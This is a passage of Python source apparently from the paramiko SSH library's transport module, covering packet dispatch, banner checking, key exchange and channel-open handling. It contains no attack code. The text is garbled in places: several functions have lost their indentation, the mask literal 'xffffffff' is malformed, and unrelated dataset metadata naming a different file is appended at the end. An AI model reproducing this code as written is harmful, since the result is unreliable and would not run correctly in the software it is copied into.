self.server_accept_cv.notify()
finally:
self.lock.release()
def _sanitize_window_size(self, window_size):
if window_size is None:
window_size = self.default_window_size
return clamp_value(MIN_WINDOW_SIZE, window_size, MAX_WINDOW_SIZE)
def _sanitize_packet_size(self, max_packet_size):
if max_packet_size is None:
max_packet_size = self.default_max_packet_size
return clamp_value(MIN_PACKET_SIZE, max_packet_size, MAX_WINDOW_SIZE)
    def _ensure_authed(self, ptype, message):
        """Gatekeeper for post-auth message types in server mode.

        Returns None when the message may proceed (client mode, auth-phase
        message, or already authenticated); otherwise returns the refusal
        `Message` the caller should send back.
        """
        if (
            not self.server_mode
            or ptype <= HIGHEST_USERAUTH_MESSAGE_ID
            or self.is_authenticated()
        ):
            return None
        # WELP. We must be dealing with someone trying to do non-auth things
        # without being authed. Tell them off, based on message class.
        reply = Message()
        # Global requests have no details, just failure.
        if ptype == MSG_GLOBAL_REQUEST:
            reply.add_byte(cMSG_REQUEST_FAILURE)
        # Channel opens let us reject w/ a specific type + message.
        elif ptype == MSG_CHANNEL_OPEN:
            kind = message.get_text()  # noqa
            chanid = message.get_int()
            reply.add_byte(cMSG_CHANNEL_OPEN_FAILURE)
            reply.add_int(chanid)
            reply.add_int(OPEN_FAILED_ADMINISTRATIVELY_PROHIBITED)
            reply.add_string("")
            reply.add_string("en")
        # NOTE: Post-open channel messages do not need checking; the above will
        # reject attemps to open channels, meaning that even if a malicious
        # user tries to send a MSG_CHANNEL_REQUEST, it will simply fall under
        # the logic that handles unknown channel IDs (as the channel list will
        # be empty.)
        return reply
    def run(self):
        """Main loop of the transport thread: read packets and dispatch
        them to kex, transport, channel, or auth handlers until the
        session dies, then tear everything down."""
        # (use the exposed "run" method, because if we specify a thread target
        # of a private method, threading.Thread will keep a reference to it
        # indefinitely, creating a GC cycle and not letting Transport ever be
        # GC'd. it's a bug in Thread.)
        # Hold reference to 'sys' so we can test sys.modules to detect
        # interpreter shutdown.
        self.sys = sys
        # active=True occurs before the thread is launched, to avoid a race
        _active_threads.append(self)
        tid = hex(long(id(self)) & xffffffff)
        if self.server_mode:
            self._log(DEBUG, "starting thread (server mode): {}".format(tid))
        else:
            self._log(DEBUG, "starting thread (client mode): {}".format(tid))
        try:
            try:
                self.packetizer.write_all(b(self.local_version + "\r\n"))
                self._log(
                    DEBUG,
                    "Local version/idstring: {}".format(self.local_version),
                )  # noqa
                self._check_banner()
                # The above is actually very much part of the handshake, but
                # sometimes the banner can be read but the machine is not
                # responding, for example when the remote ssh daemon is loaded
                # in to memory but we can not read from the disk/spawn a new
                # shell.
                # Make sure we can specify a timeout for the initial handshake.
                # Re-use the banner timeout for now.
                self.packetizer.start_handshake(self.handshake_timeout)
                self._send_kex_init()
                self._expect_packet(MSG_KEXINIT)
                while self.active:
                    if self.packetizer.need_rekey() and not self.in_kex:
                        self._send_kex_init()
                    try:
                        ptype, m = self.packetizer.read_message()
                    except NeedRekeyException:
                        continue
                    if ptype == MSG_IGNORE:
                        continue
                    elif ptype == MSG_DISCONNECT:
                        self._parse_disconnect(m)
                        break
                    elif ptype == MSG_DEBUG:
                        self._parse_debug(m)
                        continue
                    if len(self._expected_packet) > 0:
                        if ptype not in self._expected_packet:
                            raise SSHException(
                                "Expecting packet from {!r}, got {:d}".format(
                                    self._expected_packet, ptype
                                )
                            )  # noqa
                        self._expected_packet = tuple()
                        # kex messages (30-41) go straight to the kex engine
                        if (ptype >= 30) and (ptype <= 41):
                            self.kex_engine.parse_next(ptype, m)
                            continue
                    if ptype in self._handler_table:
                        error_msg = self._ensure_authed(ptype, m)
                        if error_msg:
                            self._send_message(error_msg)
                        else:
                            self._handler_table[ptype](self, m)
                    elif ptype in self._channel_handler_table:
                        chanid = m.get_int()
                        chan = self._channels.get(chanid)
                        if chan is not None:
                            self._channel_handler_table[ptype](chan, m)
                        elif chanid in self.channels_seen:
                            self._log(
                                DEBUG,
                                "Ignoring message for dead channel {:d}".format(  # noqa
                                    chanid
                                ),
                            )
                        else:
                            self._log(
                                ERROR,
                                "Channel request for unknown channel {:d}".format(  # noqa
                                    chanid
                                ),
                            )
                            break
                    elif (
                        self.auth_handler is not None
                        and ptype in self.auth_handler._handler_table
                    ):
                        handler = self.auth_handler._handler_table[ptype]
                        handler(self.auth_handler, m)
                        if len(self._expected_packet) > 0:
                            continue
                    else:
                        # Respond with "I don't implement this particular
                        # message type" message (unless the message type was
                        # itself MSG_UNIMPLEMENTED, to avoid a loop)
                        name = MSG_NAMES[ptype]
                        warning = "Oops, unhandled type {} ({!r})".format(
                            ptype, name
                        )
                        self._log(WARNING, warning)
                        if ptype != MSG_UNIMPLEMENTED:
                            msg = Message()
                            msg.add_byte(cMSG_UNIMPLEMENTED)
                            msg.add_int(m.seqno)
                            self._send_message(msg)
                    self.packetizer.complete_handshake()
            except SSHException as e:
                self._log(ERROR, "Exception: " + str(e))
                self._log(ERROR, util.tb_strings())
                self.saved_exception = e
            except EOFError as e:
                self._log(DEBUG, "EOF in transport thread")
                self.saved_exception = e
            except socket.error as e:
                if type(e.args) is tuple:
                    if e.args:
                        emsg = "{} ({:d})".format(e.args[1], e.args[0])
                    else:
                        emsg = str(e) or repr(e)
                else:
                    emsg = e.args
                self._log(ERROR, "Socket exception: " + emsg)
                self.saved_exception = e
            except Exception as e:
                self._log(ERROR, "Unknown exception: " + str(e))
                self._log(ERROR, util.tb_strings())
                self.saved_exception = e
            # teardown: unlink channels, wake all waiters, close the socket
            _active_threads.remove(self)
            for chan in list(self._channels.values()):
                chan._unlink()
            if self.active:
                self.active = False
                self.packetizer.close()
                if self.completion_event is not None:
                    self.completion_event.set()
                if self.auth_handler is not None:
                    self.auth_handler.abort()
                for event in self.channel_events.values():
                    event.set()
                try:
                    self.lock.acquire()
                    self.server_accept_cv.notify()
                finally:
                    self.lock.release()
            self.sock.close()
        except:
            # Don't raise spurious errors if this thread happens to
            # wake up during interpreter shutdown. Or rather -- raise
            # everything *if* sys.modules (used as a convenient sentinel)
            # appears to still exist.
            if self.sys.modules is not None:
                raise
def _log_agreement(self, which, local, remote):
# Log useful, non-duplicative line re: an agreed-upon algorithm.
# Old code implied algorithms could be asymmetrical (different for
# inbound vs outbound) so we preserve that possibility.
msg = "{} agreed: ".format(which)
if local == remote:
msg += local
else:
msg += "local={}, remote={}".format(local, remote)
self._log(DEBUG, msg)
# protocol stages
    def _negotiate_keys(self, m):
        """Handle an inbound MSG_KEXINIT: block outbound user packets,
        answer with our own kexinit if the peer initiated, and start the
        kex engine.

        Throws SSHException on anything unusual.
        """
        self.clear_to_send_lock.acquire()
        try:
            self.clear_to_send.clear()
        finally:
            self.clear_to_send_lock.release()
        if self.local_kex_init is None:
            # remote side wants to renegotiate
            self._send_kex_init()
        self._parse_kex_init(m)
        self.kex_engine.start_kex()
    def _check_banner(self):
        """Read and validate the remote SSH protocol banner.

        Skips up to 100 pre-banner lines, requires the "SSH-" prefix and
        protocol version 1.99 or 2.0, and stores the peer's full version
        string in ``self.remote_version``.

        :raises SSHException: on read errors, an unreadable banner, or an
            incompatible protocol version.
        """
        # this is slow, but we only have to do it once
        for i in range(100):
            # give them 15 seconds for the first line, then just 2 seconds
            # each additional line. (some sites have very high latency.)
            if i == 0:
                timeout = self.banner_timeout
            else:
                timeout = 2
            try:
                buf = self.packetizer.readline(timeout)
            except ProxyCommandFailure:
                raise
            except Exception as e:
                raise SSHException(
                    "Error reading SSH protocol banner" + str(e)
                )
            if buf[:4] == "SSH-":
                break
            self._log(DEBUG, "Banner: " + buf)
        if buf[:4] != "SSH-":
            raise SSHException('Indecipherable protocol version "' + buf + '"')
        # save this server version string for later
        self.remote_version = buf
        self._log(DEBUG, "Remote version/idstring: {}".format(buf))
        # pull off any attached comment
        # NOTE: comment used to be stored in a variable and then...never used.
        # since 2003. ca 877cd974b8182d26fa76d566072917ea67b64e67
        i = buf.find(" ")
        if i >= 0:
            buf = buf[:i]
        # parse out version string and make sure it matches
        segs = buf.split("-", 2)
        if len(segs) < 3:
            raise SSHException("Invalid SSH banner")
        version = segs[1]
        client = segs[2]
        if version != "1.99" and version != "2.0":
            msg = "Incompatible version ({} instead of 2.0)"
            raise SSHException(msg.format(version))
        msg = "Connected (version {}, client {})".format(version, client)
        self._log(INFO, msg)
    def _send_kex_init(self):
        """Announce to the other side that we'd like to negotiate keys,
        advertising our supported algorithms (MSG_KEXINIT)."""
        # block outbound user traffic until the kex completes
        self.clear_to_send_lock.acquire()
        try:
            self.clear_to_send.clear()
        finally:
            self.clear_to_send_lock.release()
        self.gss_kex_used = False
        self.in_kex = True
        if self.server_mode:
            mp_required_prefix = "diffie-hellman-group-exchange-sha"
            kex_mp = [
                k
                for k in self._preferred_kex
                if k.startswith(mp_required_prefix)
            ]
            if (self._modulus_pack is None) and (len(kex_mp) > 0):
                # can't do group-exchange if we don't have a pack of potential
                # primes
                pkex = [
                    k
                    for k in self.get_security_options().kex
                    if not k.startswith(mp_required_prefix)
                ]
                self.get_security_options().kex = pkex
            available_server_keys = list(
                filter(
                    list(self.server_key_dict.keys()).__contains__,
                    self._preferred_keys,
                )
            )
        else:
            available_server_keys = self._preferred_keys
        m = Message()
        m.add_byte(cMSG_KEXINIT)
        # 16-byte random cookie; each algorithm list is sent twice, once
        # per direction (client-to-server, server-to-client)
        m.add_bytes(os.urandom(16))
        m.add_list(self._preferred_kex)
        m.add_list(available_server_keys)
        m.add_list(self._preferred_ciphers)
        m.add_list(self._preferred_ciphers)
        m.add_list(self._preferred_macs)
        m.add_list(self._preferred_macs)
        m.add_list(self._preferred_compression)
        m.add_list(self._preferred_compression)
        m.add_string(bytes())
        m.add_string(bytes())
        m.add_boolean(False)
        m.add_int(0)
        # save a copy for later (needed to compute a hash)
        self.local_kex_init = m.asbytes()
        self._send_message(m)
    def _parse_kex_init(self, m):
        """Parse the peer's MSG_KEXINIT and agree on kex, host key,
        cipher, MAC and compression algorithms for both directions.

        :raises SSHException: if any category has no mutually acceptable
            algorithm.
        """
        m.get_bytes(16)  # cookie, discarded
        kex_algo_list = m.get_list()
        server_key_algo_list = m.get_list()
        client_encrypt_algo_list = m.get_list()
        server_encrypt_algo_list = m.get_list()
        client_mac_algo_list = m.get_list()
        server_mac_algo_list = m.get_list()
        client_compress_algo_list = m.get_list()
        server_compress_algo_list = m.get_list()
        client_lang_list = m.get_list()
        server_lang_list = m.get_list()
        kex_follows = m.get_boolean()
        m.get_int()  # unused
        self._log(
            DEBUG,
            "kex algos:"
            + str(kex_algo_list)
            + " server key:"
            + str(server_key_algo_list)
            + " client encrypt:"
            + str(client_encrypt_algo_list)
            + " server encrypt:"
            + str(server_encrypt_algo_list)
            + " client mac:"
            + str(client_mac_algo_list)
            + " server mac:"
            + str(server_mac_algo_list)
            + " client compress:"
            + str(client_compress_algo_list)
            + " server compress:"
            + str(server_compress_algo_list)
            + " client lang:"
            + str(client_lang_list)
            + " server lang:"
            + str(server_lang_list)
            + " kex follows?"
            + str(kex_follows),
        )
        # as a server, we pick the first item in the client's list that we
        # support; as a client, the first item in our list the server supports
        if self.server_mode:
            agreed_kex = list(
                filter(self._preferred_kex.__contains__, kex_algo_list)
            )
        else:
            agreed_kex = list(
                filter(kex_algo_list.__contains__, self._preferred_kex)
            )
        if len(agreed_kex) == 0:
            raise SSHException(
                "Incompatible ssh peer (no acceptable kex algorithm)"
            )
        self.kex_engine = self._kex_info[agreed_kex[0]](self)
        self._log(DEBUG, "Kex agreed: {}".format(agreed_kex[0]))
        if self.server_mode:
            available_server_keys = list(
                filter(
                    list(self.server_key_dict.keys()).__contains__,
                    self._preferred_keys,
                )
            )
            agreed_keys = list(
                filter(
                    available_server_keys.__contains__, server_key_algo_list
                )
            )
        else:
            agreed_keys = list(
                filter(server_key_algo_list.__contains__, self._preferred_keys)
            )
        if len(agreed_keys) == 0:
            raise SSHException(
                "Incompatible ssh peer (no acceptable host key)"
            )
        self.host_key_type = agreed_keys[0]
        if self.server_mode and (self.get_server_key() is None):
            raise SSHException(
                "Incompatible ssh peer (can't match requested host key type)"
            )  # noqa
        self._log_agreement("HostKey", agreed_keys[0], agreed_keys[0])
        # ciphers: "local" is the direction we send, "remote" what we receive
        if self.server_mode:
            agreed_local_ciphers = list(
                filter(
                    self._preferred_ciphers.__contains__,
                    server_encrypt_algo_list,
                )
            )
            agreed_remote_ciphers = list(
                filter(
                    self._preferred_ciphers.__contains__,
                    client_encrypt_algo_list,
                )
            )
        else:
            agreed_local_ciphers = list(
                filter(
                    client_encrypt_algo_list.__contains__,
                    self._preferred_ciphers,
                )
            )
            agreed_remote_ciphers = list(
                filter(
                    server_encrypt_algo_list.__contains__,
                    self._preferred_ciphers,
                )
            )
        if len(agreed_local_ciphers) == 0 or len(agreed_remote_ciphers) == 0:
            raise SSHException(
                "Incompatible ssh server (no acceptable ciphers)"
            )  # noqa
        self.local_cipher = agreed_local_ciphers[0]
        self.remote_cipher = agreed_remote_ciphers[0]
        self._log_agreement(
            "Cipher", local=self.local_cipher, remote=self.remote_cipher
        )
        if self.server_mode:
            agreed_remote_macs = list(
                filter(self._preferred_macs.__contains__, client_mac_algo_list)
            )
            agreed_local_macs = list(
                filter(self._preferred_macs.__contains__, server_mac_algo_list)
            )
        else:
            agreed_local_macs = list(
                filter(client_mac_algo_list.__contains__, self._preferred_macs)
            )
            agreed_remote_macs = list(
                filter(server_mac_algo_list.__contains__, self._preferred_macs)
            )
        if (len(agreed_local_macs) == 0) or (len(agreed_remote_macs) == 0):
            raise SSHException("Incompatible ssh server (no acceptable macs)")
        self.local_mac = agreed_local_macs[0]
        self.remote_mac = agreed_remote_macs[0]
        self._log_agreement(
            "MAC", local=self.local_mac, remote=self.remote_mac
        )
        if self.server_mode:
            agreed_remote_compression = list(
                filter(
                    self._preferred_compression.__contains__,
                    client_compress_algo_list,
                )
            )
            agreed_local_compression = list(
                filter(
                    self._preferred_compression.__contains__,
                    server_compress_algo_list,
                )
            )
        else:
            agreed_local_compression = list(
                filter(
                    client_compress_algo_list.__contains__,
                    self._preferred_compression,
                )
            )
            agreed_remote_compression = list(
                filter(
                    server_compress_algo_list.__contains__,
                    self._preferred_compression,
                )
            )
        if (
            len(agreed_local_compression) == 0
            or len(agreed_remote_compression) == 0
        ):
            msg = "Incompatible ssh server (no acceptable compression)"
            msg += " {!r} {!r} {!r}"
            raise SSHException(
                msg.format(
                    agreed_local_compression,
                    agreed_remote_compression,
                    self._preferred_compression,
                )
            )
        self.local_compression = agreed_local_compression[0]
        self.remote_compression = agreed_remote_compression[0]
        self._log_agreement(
            "Compression",
            local=self.local_compression,
            remote=self.remote_compression,
        )
        # save for computing hash later...
        # now wait! openssh has a bug (and others might too) where there are
        # actually some extra bytes (one NUL byte in openssh's case) added to
        # the end of the packet but not parsed; get_so_far() gives us only
        # what was actually consumed, so the hash stays correct
        self.remote_kex_init = cMSG_KEXINIT + m.get_so_far()
    def _activate_inbound(self):
        """Switch on the newly negotiated inbound cipher, MAC, and
        (possibly) compression.

        Key letters follow RFC 4253 7.2: client-to-server uses A/C/E,
        server-to-client uses B/D/F, so which set is "inbound" depends on
        server_mode.
        """
        block_size = self._cipher_info[self.remote_cipher]["block-size"]
        if self.server_mode:
            IV_in = self._compute_key("A", block_size)
            key_in = self._compute_key(
                "C", self._cipher_info[self.remote_cipher]["key-size"]
            )
        else:
            IV_in = self._compute_key("B", block_size)
            key_in = self._compute_key(
                "D", self._cipher_info[self.remote_cipher]["key-size"]
            )
        engine = self._get_cipher(
            self.remote_cipher, key_in, IV_in, self._DECRYPT
        )
        mac_size = self._mac_info[self.remote_mac]["size"]
        mac_engine = self._mac_info[self.remote_mac]["class"]
        # initial mac keys are done in the hash's natural size (not the
        # potentially truncated transmission size)
        if self.server_mode:
            mac_key = self._compute_key("E", mac_engine().digest_size)
        else:
            mac_key = self._compute_key("F", mac_engine().digest_size)
        self.packetizer.set_inbound_cipher(
            engine, block_size, mac_engine, mac_size, mac_key
        )
        compress_in = self._compression_info[self.remote_compression][1]
        # zlib@openssh.com compression is deferred until after auth
        if compress_in is not None and (
            self.remote_compression != "zlib@openssh.com" or self.authenticated
        ):
            self._log(DEBUG, "Switching on inbound compression ...")
            self.packetizer.set_inbound_compressor(compress_in())
    def _activate_outbound(self):
        """Send MSG_NEWKEYS and switch on the newly negotiated outbound
        cipher, MAC, and (possibly) compression.

        Key letters mirror `_activate_inbound`: which of A/C/E vs B/D/F is
        "outbound" depends on server_mode.
        """
        m = Message()
        m.add_byte(cMSG_NEWKEYS)
        self._send_message(m)
        block_size = self._cipher_info[self.local_cipher]["block-size"]
        if self.server_mode:
            IV_out = self._compute_key("B", block_size)
            key_out = self._compute_key(
                "D", self._cipher_info[self.local_cipher]["key-size"]
            )
        else:
            IV_out = self._compute_key("A", block_size)
            key_out = self._compute_key(
                "C", self._cipher_info[self.local_cipher]["key-size"]
            )
        engine = self._get_cipher(
            self.local_cipher, key_out, IV_out, self._ENCRYPT
        )
        mac_size = self._mac_info[self.local_mac]["size"]
        mac_engine = self._mac_info[self.local_mac]["class"]
        # initial mac keys are done in the hash's natural size (not the
        # potentially truncated transmission size)
        if self.server_mode:
            mac_key = self._compute_key("F", mac_engine().digest_size)
        else:
            mac_key = self._compute_key("E", mac_engine().digest_size)
        sdctr = self.local_cipher.endswith("-ctr")
        self.packetizer.set_outbound_cipher(
            engine, block_size, mac_engine, mac_size, mac_key, sdctr
        )
        compress_out = self._compression_info[self.local_compression][0]
        # zlib@openssh.com compression is deferred until after auth
        if compress_out is not None and (
            self.local_compression != "zlib@openssh.com" or self.authenticated
        ):
            self._log(DEBUG, "Switching on outbound compression ...")
            self.packetizer.set_outbound_compressor(compress_out())
        if not self.packetizer.need_rekey():
            self.in_kex = False
        # we always expect to receive NEWKEYS now
        self._expect_packet(MSG_NEWKEYS)
    def _auth_trigger(self):
        """Called on successful auth: mark authenticated and switch on any
        compression that was deliberately deferred until after auth
        (the zlib@openssh.com variant)."""
        self.authenticated = True
        # delayed initiation of compression
        if self.local_compression == "zlib@openssh.com":
            compress_out = self._compression_info[self.local_compression][0]
            self._log(DEBUG, "Switching on outbound compression ...")
            self.packetizer.set_outbound_compressor(compress_out())
        if self.remote_compression == "zlib@openssh.com":
            compress_in = self._compression_info[self.remote_compression][1]
            self._log(DEBUG, "Switching on inbound compression ...")
            self.packetizer.set_inbound_compressor(compress_in())
    def _parse_newkeys(self, m):
        """Handle an inbound MSG_NEWKEYS: activate the new inbound keys,
        free kex state, and (for the first exchange) finish session
        startup."""
        self._log(DEBUG, "Switch to new keys ...")
        self._activate_inbound()
        # can also free a bunch of stuff here
        self.local_kex_init = self.remote_kex_init = None
        self.K = None
        self.kex_engine = None
        if self.server_mode and (self.auth_handler is None):
            # create auth handler for server mode
            self.auth_handler = AuthHandler(self)
        if not self.initial_kex_done:
            # this was the first key exchange
            self.initial_kex_done = True
        # send an event?
        if self.completion_event is not None:
            self.completion_event.set()
        # it's now okay to send data again (if this was a re-key)
        if not self.packetizer.need_rekey():
            self.in_kex = False
        self.clear_to_send_lock.acquire()
        try:
            self.clear_to_send.set()
        finally:
            self.clear_to_send_lock.release()
        return
def _parse_disconnect(self, m):
code = m.get_int()
desc = m.get_text()
self._log(INFO, "Disconnect (code {:d}): {}".format(code, desc))
    def _parse_global_request(self, m):
        """Handle MSG_GLOBAL_REQUEST: dispatch known request kinds to the
        server object and, if the peer asked for a reply, send
        REQUEST_SUCCESS (with any extra data) or REQUEST_FAILURE.

        Note: the m.get_* calls must stay in wire order.
        """
        kind = m.get_text()
        self._log(DEBUG, 'Received global request "{}"'.format(kind))
        want_reply = m.get_boolean()
        if not self.server_mode:
            # clients never honor global requests coming from the server
            self._log(
                DEBUG,
                'Rejecting "{}" global request from server.'.format(kind),
            )
            ok = False
        elif kind == "tcpip-forward":
            address = m.get_text()
            port = m.get_int()
            ok = self.server_object.check_port_forward_request(address, port)
            if ok:
                # a truthy result (the bound port) is returned as extra data
                ok = (ok,)
        elif kind == "cancel-tcpip-forward":
            address = m.get_text()
            port = m.get_int()
            self.server_object.cancel_port_forward_request(address, port)
            ok = True
        else:
            ok = self.server_object.check_global_request(kind, m)
        extra = ()
        if type(ok) is tuple:
            # tuple result means success plus extra reply payload
            extra = ok
            ok = True
        if want_reply:
            msg = Message()
            if ok:
                msg.add_byte(cMSG_REQUEST_SUCCESS)
                msg.add(*extra)
            else:
                msg.add_byte(cMSG_REQUEST_FAILURE)
            self._send_message(msg)
def _parse_request_success(self, m):
self._log(DEBUG, "Global request successful.")
self.global_response = m
if self.completion_event is not None:
self.completion_event.set()
def _parse_request_failure(self, m):
self._log(DEBUG, "Global request denied.")
self.global_response = None
if self.completion_event is not None:
self.completion_event.set()
    def _parse_channel_open_success(self, m):
        """Handle MSG_CHANNEL_OPEN_SUCCESS: bind our local channel to the
        server-side channel id/window and wake the thread waiting on it.
        """
        chanid = m.get_int()
        server_chanid = m.get_int()
        server_window_size = m.get_int()
        server_max_packet_size = m.get_int()
        chan = self._channels.get(chanid)
        if chan is None:
            # peer confirmed a channel we never asked for; ignore
            self._log(WARNING, "Success for unrequested channel! [??]")
            return
        self.lock.acquire()
        try:
            chan._set_remote_channel(
                server_chanid, server_window_size, server_max_packet_size
            )
            self._log(DEBUG, "Secsh channel {:d} opened.".format(chanid))
            if chanid in self.channel_events:
                # unblock open_channel() waiting on this event
                self.channel_events[chanid].set()
                del self.channel_events[chanid]
        finally:
            self.lock.release()
        return
    def _parse_channel_open_failure(self, m):
        """Handle MSG_CHANNEL_OPEN_FAILURE: record a ChannelException for the
        opener and wake the thread waiting on the channel event.
        """
        chanid = m.get_int()
        reason = m.get_int()
        reason_str = m.get_text()
        m.get_text()  # ignored language tag from the wire message
        reason_text = CONNECTION_FAILED_CODE.get(reason, "(unknown code)")
        self._log(
            ERROR,
            "Secsh channel {:d} open FAILED: {}: {}".format(
                chanid, reason_str, reason_text
            ),
        )
        self.lock.acquire()
        try:
            # saved_exception is re-raised in the opener's thread
            self.saved_exception = ChannelException(reason, reason_text)
            if chanid in self.channel_events:
                self._channels.delete(chanid)
                if chanid in self.channel_events:
                    self.channel_events[chanid].set()
                    del self.channel_events[chanid]
        finally:
            self.lock.release()
        return
    def _parse_channel_open(self, m):
        """Handle MSG_CHANNEL_OPEN from the peer.

        Accepts agent-forward, x11, and forwarded-tcpip channels when a
        handler was registered; in server mode defers to the server object;
        otherwise rejects.  On acceptance a local `Channel` is created,
        registered, confirmed on the wire, and handed to the matching
        handler (or queued for `accept()`).

        Note: the m.get_* calls in each branch must stay in wire order.
        """
        kind = m.get_text()
        chanid = m.get_int()
        initial_window_size = m.get_int()
        max_packet_size = m.get_int()
        reject = False
        if (
            kind == "auth-agent@openssh.com"
            and self._forward_agent_handler is not None
        ):
            self._log(DEBUG, "Incoming forward agent connection")
            self.lock.acquire()
            try:
                my_chanid = self._next_channel()
            finally:
                self.lock.release()
        elif (kind == "x11") and (self._x11_handler is not None):
            origin_addr = m.get_text()
            origin_port = m.get_int()
            self._log(
                DEBUG,
                "Incoming x11 connection from {}:{:d}".format(
                    origin_addr, origin_port
                ),
            )
            self.lock.acquire()
            try:
                my_chanid = self._next_channel()
            finally:
                self.lock.release()
        elif (kind == "forwarded-tcpip") and (self._tcp_handler is not None):
            server_addr = m.get_text()
            server_port = m.get_int()
            origin_addr = m.get_text()
            origin_port = m.get_int()
            self._log(
                DEBUG,
                "Incoming tcp forwarded connection from {}:{:d}".format(
                    origin_addr, origin_port
                ),
            )
            self.lock.acquire()
            try:
                my_chanid = self._next_channel()
            finally:
                self.lock.release()
        elif not self.server_mode:
            # clients only accept the three handler-backed kinds above
            self._log(
                DEBUG,
                'Rejecting "{}" channel request from server.'.format(kind),
            )
            reject = True
            reason = OPEN_FAILED_ADMINISTRATIVELY_PROHIBITED
        else:
            # server mode: let the server object decide
            self.lock.acquire()
            try:
                my_chanid = self._next_channel()
            finally:
                self.lock.release()
            if kind == "direct-tcpip":
                # handle direct-tcpip requests coming from the client
                dest_addr = m.get_text()
                dest_port = m.get_int()
                origin_addr = m.get_text()
                origin_port = m.get_int()
                reason = self.server_object.check_channel_direct_tcpip_request(
                    my_chanid,
                    (origin_addr, origin_port),
                    (dest_addr, dest_port),
                )
            else:
                reason = self.server_object.check_channel_request(
                    kind, my_chanid
                )
            if reason != OPEN_SUCCEEDED:
                self._log(
                    DEBUG,
                    'Rejecting "{}" channel request from client.'.format(kind),
                )
                reject = True
        if reject:
            msg = Message()
            msg.add_byte(cMSG_CHANNEL_OPEN_FAILURE)
            msg.add_int(chanid)
            msg.add_int(reason)
            msg.add_string("")
            msg.add_string("en")
            self._send_message(msg)
            return

        # accepted: create and register the local channel under the lock
        chan = Channel(my_chanid)
        self.lock.acquire()
        try:
            self._channels.put(my_chanid, chan)
            self.channels_seen[my_chanid] = True
            chan._set_transport(self)
            chan._set_window(
                self.default_window_size, self.default_max_packet_size
            )
            chan._set_remote_channel(
                chanid, initial_window_size, max_packet_size
            )
        finally:
            self.lock.release()
        # confirm the open to the peer
        m = Message()
        m.add_byte(cMSG_CHANNEL_OPEN_SUCCESS)
        m.add_int(chanid)
        m.add_int(my_chanid)
        m.add_int(self.default_window_size)
        m.add_int(self.default_max_packet_size)
        self._send_message(m)
        self._log(
            DEBUG, "Secsh channel {:d} ({}) opened.".format(my_chanid, kind)
        )
        # hand the new channel to the registered handler, or queue it
        if kind == "auth-agent@openssh.com":
            self._forward_agent_handler(chan)
        elif kind == "x11":
            self._x11_handler(chan, (origin_addr, origin_port))
        elif kind == "forwarded-tcpip":
            chan.origin_addr = (origin_addr, origin_port)
            self._tcp_handler(
                chan, (origin_addr, origin_port), (server_addr, server_port)
            )
        else:
            self._queue_incoming_channel(chan)
    def _parse_debug(self, m):
        """Handle MSG_DEBUG: log the (sanitized) debug text from the peer."""
        m.get_boolean()  # always_display flag, ignored
        msg = m.get_string()
        m.get_string()  # language tag, ignored
        self._log(DEBUG, "Debug msg: {}".format(util.safe_string(msg)))
    def _get_subsystem_handler(self, name):
        """Return the (handler_class, args, kwargs) registered for subsystem
        ``name``, or ``(None, [], {})`` if none was registered.
        """
        try:
            self.lock.acquire()
            if name not in self.subsystem_table:
                return None, [], {}
            return self.subsystem_table[name]
        finally:
            self.lock.release()
_handler_table = {
MSG_NEWKEYS: _parse_newkeys,
MSG_GLOBAL_REQUEST: _parse_global_request,
MSG_REQUEST_SUCCESS: _parse_request_success,
MSG_REQUEST_FAILURE: _parse_request_failure,
MSG_CHANNEL_OPEN_SUCCESS: _parse_channel_open_success,
MSG_CHANNEL_OPEN_FAILURE: _parse_channel_open_failure,
MSG_CHANNEL_OPEN: _parse_channel_open,
MSG_KEXINIT: _negotiate_keys,
}
_channel_handler_table = {
MSG_CHANNEL_SUCCESS: Channel._request_success,
MSG_CHANNEL_FAILURE: Channel._request_failed,
MSG_CHANNEL_DATA: Channel._feed,
MSG_CHANNEL_EXTENDED_DATA: Channel._feed_extended,
MSG_CHANNEL_WINDOW_ADJUST: Channel._window_adjust,
MSG_CHANNEL_REQUEST: Channel._handle_request,
MSG_CHANNEL_EOF: Channel._handle_eof,
MSG_CHANNEL_CLOSE: Channel._handle_close,
}
class SecurityOptions(object):
    """A view onto a transport's negotiable algorithm preferences.

    Each property reflects (and validates writes to) the corresponding
    ``_preferred_*`` tuple on the wrapped transport.
    """

    __slots__ = "_transport"

    def __init__(self, transport):
        self._transport = transport

    def __repr__(self):
        return "<paramiko.SecurityOptions for {!r}>".format(self._transport)

    def _set(self, name, orig, x):
        """Validate *x* against the transport's ``orig`` table, then store it
        as a tuple under attribute ``name``.
        """
        if type(x) is list:
            x = tuple(x)
        if type(x) is not tuple:
            raise TypeError("expected tuple or list")
        known = getattr(self._transport, orig)
        # every requested algorithm must be one the transport knows about
        if any(algo not in known for algo in x):
            raise ValueError("unknown cipher")
        setattr(self._transport, name, x)

    @property
    def ciphers(self):
        """Symmetric encryption ciphers, in preference order."""
        return self._transport._preferred_ciphers

    @ciphers.setter
    def ciphers(self, x):
        self._set("_preferred_ciphers", "_cipher_info", x)

    @property
    def digests(self):
        """MAC (digest) algorithms, in preference order."""
        return self._transport._preferred_macs

    @digests.setter
    def digests(self, x):
        self._set("_preferred_macs", "_mac_info", x)

    @property
    def key_types(self):
        """Host key algorithms, in preference order."""
        return self._transport._preferred_keys

    @key_types.setter
    def key_types(self, x):
        self._set("_preferred_keys", "_key_info", x)

    @property
    def kex(self):
        """Key exchange algorithms, in preference order."""
        return self._transport._preferred_kex

    @kex.setter
    def kex(self, x):
        self._set("_preferred_kex", "_kex_info", x)

    @property
    def compression(self):
        """Compression schemes, in preference order."""
        return self._transport._preferred_compression

    @compression.setter
    def compression(self, x):
        self._set("_preferred_compression", "_compression_info", x)
class ChannelMap(object):
    """Thread-safe map from channel id to `Channel`.

    Values are held via weak references so closed/forgotten channels can be
    garbage collected without explicit removal.
    """

    def __init__(self):
        self._map = weakref.WeakValueDictionary()
        self._lock = threading.Lock()

    def put(self, chanid, chan):
        """Register *chan* under *chanid* (weakly referenced)."""
        with self._lock:
            self._map[chanid] = chan

    def get(self, chanid):
        """Return the channel for *chanid*, or None if absent/collected."""
        with self._lock:
            return self._map.get(chanid, None)

    def delete(self, chanid):
        """Remove *chanid* if present; silently ignore unknown ids."""
        with self._lock:
            self._map.pop(chanid, None)

    def values(self):
        """Snapshot of all live channels as a list."""
        with self._lock:
            return list(self._map.values())

    def __len__(self):
        with self._lock:
            return len(self._map)
| true | true |
f72eef8c95e4f3ef8a9225bc7ec3eeffb64fa31f | 131 | py | Python | Gluharniki.py | regostar/competitive_prog_py | 56db79c431c5823039e6749063f3b21d5e79ca44 | [
"MIT"
